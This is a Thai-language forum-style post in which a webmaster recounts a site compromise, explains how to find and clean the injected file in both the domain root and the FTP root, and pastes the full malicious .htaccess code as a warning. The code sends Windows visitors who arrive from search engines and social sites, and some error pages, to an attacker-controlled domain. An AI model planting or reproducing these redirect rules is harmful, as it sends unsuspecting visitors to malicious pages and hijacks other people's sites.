ขอแชร์ประสบการ์ณเรื่องเว็บโดน Hack โดยการเขียนไฟล์ .htaccess ให้ Redirect ไปยังโดเมน http://ns1.chestermoon.com
อาการของมันคือเข้าหน้าบ้างหน้าได้ บ้างหน้ามันจะขึ้น Error แล้วก็จะฟ้องเรื่อง DNS อะไรสักอย่างเกี่ยวกับเว็บ http://ns1.chestermoon.com นี้ แต่บ้างครั้งมันจะไม่ฟ้องอะไรเลย เราก็จะต้องนั่งหาสาเหตุอยู่นานถึงจะมาเจอว่าไฟล์ .htaccess ถูกแก้ไข ขอเตือนไว้ก่อนว่ามันไม่ได้อยู่แค่ Root Domains มันขึ้นไปอยู่ใน Root Path ที่ FTP สามารถเข้าได้เลยครับ บ้างท่านอาจจะแก้แค่ Root Domains แต่มันจะไม่หาย เราต้องเข้าไปแก้ไฟล์ .htaccess Root Path ด้วยนะครับ จะลบไปหรือจะลบแค่ Code ของมันที่ทำงานก็แล้วแต่ครับ
อันนี้เป็น Code .htaccess Redirect ที่ผมโดนครับ ฝากไว้เป็นตัวอย่างให้ทุกท่านครับ
#
# DO NOT EDIT THIS FILE!
#ErrorDocument 500 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=0
ErrorDocument 502 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=2
ErrorDocument 403 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=3RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.chestermoon.com/main.php?e=r&h=%{HTTP_HOST}&i=J8qoitQcr/Kijhj9UMNCwpEZ [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.chestermoon.com/main.php?e=4&h=%{HTTP_HOST}&i=J8qoitQcr/Kijhj9UMNCwpEZ [R,L]
ตอนนี้ผมก็กำลังโดนตัวนี้เลยครับ ไม่รู้จะแก้ยังไง….เศร้าจริง